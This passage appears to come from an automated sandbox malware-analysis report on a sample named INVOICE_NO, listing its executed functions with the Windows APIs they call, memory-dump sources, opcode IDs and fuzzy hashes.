GlobalMemoryStatusEx 28349->28351 28351->28349 28354 62c7988 28352->28354 28353 62c7be8 28353->28315 28354->28353 28355 62c8009 GlobalMemoryStatusEx 28354->28355 28355->28354 28358 62c799d 28356->28358 28357 62c7be8 28357->28315 28358->28357 28359 62c8009 GlobalMemoryStatusEx 28358->28359 28359->28358

                                            Executed Functions

                                            Function 02E3F650 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02E3F78B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628800251.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2e30000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: 2a410a457dbc4ad0da3ca7de65665980562181413c2f3b118f81a4fcd6429f2b
                                            • Instruction ID: 2b08224e6b83033b54465f98da1789e28a753177ef4fe4140fa2a821d9ed1cb9
                                            • Opcode Fuzzy Hash: 2a410a457dbc4ad0da3ca7de65665980562181413c2f3b118f81a4fcd6429f2b
                                            • Instruction Fuzzy Hash: 26513474D102188FDB15CFA9C888B9EFBB5BF48318F14912AE815BB754C774A844CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 062C9AA8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.637505037.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_62c0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f793cd842414bd0c5ed189a21752d4594d08dfc75393beacac71af68812ca31
                                            • Instruction ID: 1f05c5b42a870212e2ee9ea230c657a6e8c400cc82947bec82ddeda8f404aeb8
                                            • Opcode Fuzzy Hash: 9f793cd842414bd0c5ed189a21752d4594d08dfc75393beacac71af68812ca31
                                            • Instruction Fuzzy Hash: 09513771D143855FCB10CFB9C8502DABFF5EF8A310F1486AAD884A7282D7749885CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02E3F645 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02E3F78B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628800251.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2e30000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: cfcc3498073f3a48f1374ff17cf3a20e9501b49d145a3c8c01f4de9dd7e6a4af
                                            • Instruction ID: c55a900cb2cdd999cc25985e2c381c18b37f3acfc3b42a5731a8b0a6128aa6b9
                                            • Opcode Fuzzy Hash: cfcc3498073f3a48f1374ff17cf3a20e9501b49d145a3c8c01f4de9dd7e6a4af
                                            • Instruction Fuzzy Hash: F7513374E102188FDB19CFA9C889B9DBBB1BF48308F14D12AE815BB754C7749844CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02E37565 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNELBASE(?), ref: 02E37657
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628800251.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2e30000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 6b7cd475f671d527171d02e667d1f553de9fb0947174f98b3564f8093556d133
                                            • Instruction ID: 773b2bcbe8c763fae3b082e1c6b30d8a13c2ba54974fb966d6f995f05b2ff07c
                                            • Opcode Fuzzy Hash: 6b7cd475f671d527171d02e667d1f553de9fb0947174f98b3564f8093556d133
                                            • Instruction Fuzzy Hash: 4A4167B0D006189FDB11CFA9C89979EFBF1EB48318F10D12AD815AB384D7749846CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02E359C0 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNELBASE(?), ref: 02E37657
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628800251.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2e30000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 11186e8e291661eb62d26d460316b2fd3e3f0c8be16e5029000a4ec65641d38c
                                            • Instruction ID: 4798c7a7d351ac2156103e89cb6498286e4e06e766d213f9892f4f0b9820f2ae
                                            • Opcode Fuzzy Hash: 11186e8e291661eb62d26d460316b2fd3e3f0c8be16e5029000a4ec65641d38c
                                            • Instruction Fuzzy Hash: A64147B0E006589FDB11CFA9C99979EFBF1EB48318F10D129E815AB384D7749885CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 062CDB30 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062CDBBF
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.637505037.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_62c0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 496204fad8294a859dbd8542c69c48494ca4952dd116df23ded896c973072e72
                                            • Instruction ID: 3753b66ec7e99b0b9c2b0a8faa04ad5433cc40f6425856fb24ea5e93d78a1f6d
                                            • Opcode Fuzzy Hash: 496204fad8294a859dbd8542c69c48494ca4952dd116df23ded896c973072e72
                                            • Instruction Fuzzy Hash: A221F4B5900208AFDB10CFAAD984ADEBFF9FF48324F14841AE814A3310D375A945CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 062CDB38 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062CDBBF
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.637505037.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_62c0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 53663b9d0862122bc2283b33ee5ee66e7544ac4fbdaa7d8d96540e79ad45bf7b
                                            • Instruction ID: 31214cfb53d4118d64816d427fdf32894ddfbb98b3c98af034aa97866993329e
                                            • Opcode Fuzzy Hash: 53663b9d0862122bc2283b33ee5ee66e7544ac4fbdaa7d8d96540e79ad45bf7b
                                            • Instruction Fuzzy Hash: AC21E2B59002099FDB10CFAAD984ADEBFF9FB48324F14841AE814B3310D378A944CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 062C9B90 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 062C9BF7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.637505037.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_62c0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: a008c36ab68f93f1e09dc6f178d039d9822fa87d24751a89548b8bfb0bba9e0b
                                            • Instruction ID: 3ad5791ea09db28795bfacbdb985a55be60b60c1b177c2e4568542a7e6606aaa
                                            • Opcode Fuzzy Hash: a008c36ab68f93f1e09dc6f178d039d9822fa87d24751a89548b8bfb0bba9e0b
                                            • Instruction Fuzzy Hash: BD1123B5C0021A9BCB10CF9AC944BDEFBF5AF48324F14812AD818B7240D378A945CFE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012DD3EC Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628378257.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_12dd000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d79795e76de7f2da6e1b59ffb46b9785cda39fdff7614be59fc585439a42c0e
                                            • Instruction ID: a15a9aa429e8a65705180bff9e90078942e004ed2322cd86b792b84558753b0d
                                            • Opcode Fuzzy Hash: 5d79795e76de7f2da6e1b59ffb46b9785cda39fdff7614be59fc585439a42c0e
                                            • Instruction Fuzzy Hash: C2213675110648EFDB01DF98D9C0B67BF65FB84324F24C56DD9090B286C336E446C6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012DD4D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628378257.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_12dd000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 869f2f76d4250cf6ee422e3a97ea8f4920a9e22781adcf2122cc90435ece0eac
                                            • Instruction ID: b077d1b1cdcedce8f734bf430838c628b363e1a401bda92172fc0a8aa3d1aa70
                                            • Opcode Fuzzy Hash: 869f2f76d4250cf6ee422e3a97ea8f4920a9e22781adcf2122cc90435ece0eac
                                            • Instruction Fuzzy Hash: 33216A75510648DFDB11CF58E9C0F17BF65FB88328F64856DD9050B286C336D855CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012ED01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628448102.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_12ed000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc3276f9d2b8616d1c1708faab9a086b5dda936a34f7d2643edd6626d5cb0728
                                            • Instruction ID: 8b823edbe5c35a329c7b14ac2a5753a0cfebea7ccd6d4b16b7addb0210554dc0
                                            • Opcode Fuzzy Hash: bc3276f9d2b8616d1c1708faab9a086b5dda936a34f7d2643edd6626d5cb0728
                                            • Instruction Fuzzy Hash: E4216475214248DFDB11CF68D9C8B16BFA1FB88354F68C96DD90A0B246C33BD807CA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012DD3E7 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628378257.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_12dd000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                            • Instruction ID: 4c2555b1791a5bf436bd25cc32a2a7f4c48baa33019e6e9c425d86404858babf
                                            • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                            • Instruction Fuzzy Hash: A7110376404284CFCB02CF44D9C0B56BF72FB84324F28C6ADD9480B656C33AE45ACBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012DD4D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628378257.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_12dd000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                            • Instruction ID: f00e0020fefc82c4521ee1ca1a7c6ba32b9fc3d752362d2d7810b26a1459e501
                                            • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                            • Instruction Fuzzy Hash: BC110376404684CFCF12CF44D9C0B16BF71FB84324F2886A9D9050B256C33AD45ACBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012ED017 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.628448102.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_12ed000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                            • Instruction ID: c548b6251f02fe97092f4df87a9707d60a3ecf845e2883f931956779a90d6731
                                            • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                            • Instruction Fuzzy Hash: C111D075504284CFDB12CF18D5C4B15FFA1FB84314F28C6ADD9494B656C33AD44ACB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%